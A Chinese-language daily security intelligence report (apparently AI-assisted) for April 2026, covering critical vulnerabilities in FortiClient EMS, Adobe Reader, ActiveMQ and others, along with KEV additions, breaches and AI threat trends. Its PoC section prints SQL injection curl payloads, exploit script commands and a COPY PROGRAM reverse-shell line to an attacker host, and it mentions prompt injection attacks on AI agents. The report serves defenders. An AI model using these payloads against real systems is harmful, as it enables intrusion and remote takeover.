每日安全情报报告 · 2026-04-14

报告日期 ：2026年04月14日（星期二）
信息来源：CISA KEV、The Hacker News、Bishop Fox、Check Point Research、NVD

一、高危漏洞预警

🔴 CVE-2026-35616：Fortinet FortiClient EMS 预认证 API 绕过 RCE

属性	详情
CVE编号	CVE-2026-35616
CVSS评分	9.1（严重）
漏洞类型	访问控制不当（CWE-284）
受影响版本	FortiClient EMS 7.4.5、7.4.6
修复版本	7.4.7（或应用官方热修复）
利用条件	无需认证，网络可达
威胁状态	🚨 在野利用，CISA KEV 已收录

漏洞描述：FortiClient EMS 终端管理平台存在严重的 API 认证绕过漏洞。未经身份验证的远程攻击者可通过构造特定请求访问内部 API 端点，执行任意命令，实现远程代码执行。

影响范围 ：

全球约 2,000+ 实例暴露于公网（Shodan 数据）
主要影响企业终端安全管理基础设施

缓解措施 ：

立即升级至 FortiClient EMS 7.4.7
如无法立即升级，应用 Fortinet 官方热修复补丁
通过防火墙限制 EMS 管理界面的访问来源

参考链接 ：

🔴 CVE-2026-21643：Fortinet FortiClient EMS SQL 注入 RCE

属性	详情
CVE编号	CVE-2026-21643
CVSS评分	9.8（严重）
漏洞类型	SQL 注入（CWE-89）
受影响版本	FortiClient EMS 7.4.4
修复版本	7.4.5 或更高
利用条件	无需认证，需启用多租户模式
威胁状态	🚨 在野利用，CISA KEV 已收录

漏洞描述 ：FortiClient EMS 7.4.4 在多租户功能中存在预认证 SQL 注入漏洞。HTTP 请求头中的 Site 字段值在设置 PostgreSQL 的 search_path 时未经过滤，直接拼接到 SQL 查询中，攻击者可执行任意 SQL 命令，进而通过 COPY ... PROGRAM 实现远程代码执行。

利用端点 ：

GET /api/v1/init_consts（推荐，无认证、无锁定）
POST /api/v1/auth/signin（受暴力破解保护）

PoC 利用示例：

bash 复制代码

# 指纹识别
curl -H "Site: x'; SELECT pg_sleep(10)--" \
  https://target.com/api/v1/init_consts

# 数据提取（错误型注入）
curl -H "Site: x'; CAST((SELECT current_user)::text AS int)--" \
  https://target.com/api/v1/init_consts

参考链接 ：

🔴 CVE-2026-34621：Adobe Acrobat Reader 原型污染零日 RCE

属性	详情
CVE编号	CVE-2026-34621
CVSS评分	8.6（高危）
漏洞类型	原型污染（Prototype Pollution）
受影响版本	Acrobat Reader 24.001.30356、26.001.21367 及更早版本
修复版本	2026年4月11日安全更新版本
利用条件	用户打开恶意 PDF 文件
威胁状态	🚨 在野利用 4+ 月，CISA KEV 已收录

漏洞描述：Adobe Acrobat 和 Reader 存在原型污染漏洞，允许攻击者通过恶意 PDF 文件中的 JavaScript 代码修改对象原型属性，从而实现任意代码执行。该漏洞自 2025 年 12 月起已被在野利用，主要针对能源基础设施领域。

影响范围 ：

Windows 和 macOS 平台的 Acrobat 及 Reader
企业环境中通过邮件分发的 PDF 文档

缓解措施 ：

立即更新至 Adobe 2026年4月11日发布的安全版本
在 Acrobat/Reader 中禁用 JavaScript 执行（编辑 > 首选项 > JavaScript）
使用沙箱环境打开可疑 PDF 文件

参考链接 ：

🟠 CVE-2026-39987：Marimo Python Notebook 预认证 RCE

属性	详情
CVE编号	CVE-2026-39987
CVSS评分	9.3（严重）
漏洞类型	代码执行
受影响版本	Marimo < 0.12.0
修复版本	0.12.0 或更高
威胁状态	⚠️ 披露后 10 小时内即遭利用

漏洞描述：Marimo 是一个响应式 Python Notebook 工具，存在预认证远程代码执行漏洞。未经身份验证的攻击者可通过构造特定请求在服务器上执行任意命令。

参考链接 ：

🟠 CVE-2026-34197：Apache ActiveMQ Classic 13年潜伏 RCE

属性	详情
CVE编号	CVE-2026-34197
CVSS评分	8.8（高危）
漏洞类型	Jolokia 代码注入
受影响版本	Apache ActiveMQ Classic 5.x
修复版本	5.18.7、5.17.8、5.16.8、5.15.16
威胁状态	⚠️ PoC 已公开

漏洞描述：Apache ActiveMQ Classic 存在长达 13 年的 Jolokia 代码注入漏洞，Claude AI 仅用 10 分钟即发现该漏洞。攻击者可利用 Jolokia 管理接口执行任意代码。

PoC 仓库 ：

GitHub - dinosn/CVE-2026-34197

参考链接 ：

🟠 CVE-2026-33026：Nginx UI 备份恢复加密设计缺陷 RCE

属性	详情
CVE编号	CVE-2026-33026
CVSS评分	9.1/9.4（严重）
漏洞类型	加密设计缺陷
威胁状态	⚠️ PoC 已公开

漏洞描述：Nginx UI 的备份恢复机制存在加密设计缺陷，攻击者可篡改加密备份文件，在恢复过程中执行任意代码。

PoC 参考 ：

二、漏洞 PoC 情报

1. CVE-2026-35616 Fortinet EMS PoC

GitHub 仓库 ：z3r0h3ro/CVE-2026-35616-poc

使用方法：

bash 复制代码

# 克隆仓库
git clone https://github.com/z3r0h3ro/CVE-2026-35616-poc.git
cd CVE-2026-35616-poc

# 安装依赖
pip install -r requirements.txt

# 执行检测
python exploit.py --target https://target.com --check

# 执行利用
python exploit.py --target https://target.com --command "whoami"

影响版本：FortiClient EMS 7.4.5 - 7.4.6

2. CVE-2026-21643 Fortinet EMS SQL 注入 PoC

技术分析 ：Bishop Fox 深度分析

手动验证：

bash 复制代码

# 步骤1：确认目标启用多租户模式
curl -s https://target.com/api/v1/init_consts | grep -i "SITES_ENABLED"

# 步骤2：时间延迟注入验证
curl -H "Site: x'; SELECT pg_sleep(5)--" \
  -w "@%{time_total}" \
  https://target.com/api/v1/init_consts

# 步骤3：错误型注入提取数据
curl -H "Site: x'; CAST((SELECT version())::text AS int)--" \
  https://target.com/api/v1/init_consts 2>&1 | grep -oP "ERROR: \K.*"

RCE 利用链：

sql 复制代码

-- 通过 COPY PROGRAM 执行系统命令
COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"';

3. CVE-2026-34197 Apache ActiveMQ PoC

GitHub 仓库 ：dinosn/CVE-2026-34197

使用方法：

bash 复制代码

# 克隆仓库
git clone https://github.com/dinosn/CVE-2026-34197.git
cd CVE-2026-34197

# 查看利用说明
cat README.md

# 执行 PoC
python3 exploit.py --target http://target:8161 --cmd "whoami"

漏洞原理：通过 Jolokia 管理接口的代码注入实现 RCE

4. CVE-2026-33026 Nginx UI PoC

漏洞分析 ：CyberPress 技术报告

利用步骤：

bash 复制代码

# 步骤1：生成恶意备份文件
python3 generate_malicious_backup.py --output malicious.tar.gz

# 步骤2：上传恶意备份到 Nginx UI
# 通过 Web 界面或 API 上传

# 步骤3：触发恢复操作
# 系统将在恢复过程中执行嵌入的恶意代码

三、网络安全最新文章

1. CISA 新增 7 个已知被利用漏洞至 KEV 目录

发布日期 ：2026年4月13日
来源：CISA 官方公告

新增漏洞清单：

CVE编号	厂商	漏洞类型	CVSS
CVE-2012-1854	Microsoft	VBA 不安全库加载	中危
CVE-2020-9715	Adobe	Acrobat 释放后使用	高危
CVE-2023-21529	Microsoft	Exchange 反序列化	高危
CVE-2023-36424	Microsoft	Windows 越界读取	中危
CVE-2025-60710	Microsoft	Windows 链接跟随	中危
CVE-2026-21643	Fortinet	SQL 注入	严重
CVE-2026-34621	Adobe	原型污染	高危

摘要：CISA 于 4 月 13 日将 7 个已被在野利用的漏洞加入 KEV 目录，联邦机构需在 2026 年 4 月 27 日前完成修复。此次更新涵盖 Microsoft、Adobe、Fortinet 三家厂商产品。

2. Check Point 2026年4月威胁情报报告

发布日期 ：2026年4月13日
来源：Check Point Research

关键发现：

重大数据泄露事件 ：

洛杉矶警察局（LAPD） ：7.7 TB 数据泄露，涉及 33.7 万份文件，包含人员记录和内部事务材料
荷兰 ChipSoft ：医疗软件供应商遭勒索软件攻击，HiX 平台被攻陷，多家医院服务中断
德国 Die Linke 政党 ：遭 Qilin 勒索软件攻击，IT 基础设施被迫关闭
Bitcoin Depot：美国加密货币 ATM 运营商遭攻击，损失 50+ 比特币（约 360 万美元）

AI 威胁趋势 ：

GrafanaGhost 攻击 ：针对 Grafana AI 组件的间接提示注入攻击
AI Agent Traps ：六种可操纵自主 AI 代理的网络攻击类型
AI 供应链风险：第三方 AI 模型 API 路由器可能劫持代理工具调用

漏洞利用态势 ：

Ivanti CVE-2026-1340（CVSS 9.8）已被主动利用
Marimo CVE-2026-39987 披露后 10 小时内即遭利用
FortiClient EMS CVE-2026-35616 持续在野利用

3月威胁统计 ：

组织平均每周遭受 1,995 次攻击
教育行业仍是主要目标
勒索软件事件上升至 672 起

3. ShinyHunters 勒索组织活跃：Rockstar Games 与 Ryan LLC 遭攻击

截止日期 ：2026年4月14日（今日）
来源：NotebookCheck

事件概述 ：

Rockstar Games ：遭 ShinyHunters 攻击，声称通过 Anodot-Snowflake 集成获取 GTA 6 相关数据，勒索截止日为 4 月 14 日
Ryan LLC：4.8M+ Salesforce 记录泄露，包含 PII 和内部信息，同样面临今日勒索截止期限

攻击手法 ：

利用 Snowflake 数据平台的弱凭证或配置缺陷
针对第三方集成组件（如 Anodot）进行供应链攻击

4. AI 驱动网络攻击同比增长 89%

发布日期 ：2026年4月7日
来源：Foresiet 研究报告

关键数据 ：

2026年 AI 驱动攻击同比增长 89%
已验证 9 起重大 AI 自主攻击事件
AI 从"防御者优势"转变为"攻击者武器"

典型案例 ：

Claude Mythos ：AI 自主发现数千零日漏洞
FreeBSD 内核 RCE ：AI 4 小时内独立完成漏洞发现和利用链构建
Apache ActiveMQ：Claude 10 分钟发现 13 年潜伏漏洞

防御建议 ：

部署 AI 驱动的威胁检测系统
加强 AI 供应链安全审查
建立 AI 安全红队演练机制

四、安全建议

紧急行动项（24小时内）

Fortinet 用户：
立即检查 FortiClient EMS 版本
如运行 7.4.4/7.4.5/7.4.6，立即升级或应用热修复
限制 EMS 管理界面访问来源
Adobe 用户：
更新 Acrobat/Reader 至 2026年4月版本
考虑临时禁用 JavaScript
所有组织：
审查 CISA KEV 目录新增漏洞
优先修复在野利用漏洞

本周关注重点

勒索软件：Qilin、Medusa 持续活跃，重点关注医疗、教育、金融行业
供应链攻击：npm、PyPI 恶意包持续增加，加强依赖审查
AI 威胁：AI 自主攻击能力快速提升，需更新防御策略

五、参考资源

本报告由 AI 辅助生成，仅供参考。请及时关注官方安全公告获取最新信息。